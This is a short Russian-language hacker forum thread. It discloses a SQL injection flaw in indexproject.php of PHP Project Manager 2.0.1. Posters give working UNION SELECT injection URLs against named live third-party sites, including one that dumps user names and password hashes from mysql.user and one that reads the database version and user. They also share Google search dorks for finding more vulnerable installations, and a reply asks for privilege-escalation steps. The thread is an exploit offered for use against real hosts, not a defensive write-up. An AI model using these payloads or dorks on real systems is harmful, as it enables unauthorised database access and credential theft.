изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю. PHP Project Manager версия => 2.0.1 описание: Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных. пример: Code: http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/* на секлабе баги нету(ну и вроде в др местах тоже)
мде =\ Code: http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/* это в sqlz можно..
я Строка для поиска в гугл: inurl:indexproject.php?id Мдя, не густо: Code: http://www.google.ru/search?hl=ru&q=inurl%3Aindexproject.php%3Fid&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr= и так тоже: Code: http://www.google.ru/search?hl=ru&newwindow=1&q=%22PHP+Project+Manager+2.0.1%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr= Ну да, скуль есть: Code: http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-1+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* тока двиг не популярный...
ммм если ты даешь пример sql то для этого есть тема, если ты даешь уязвимость в движке ты пишешь как и при каких условиях поднять права.
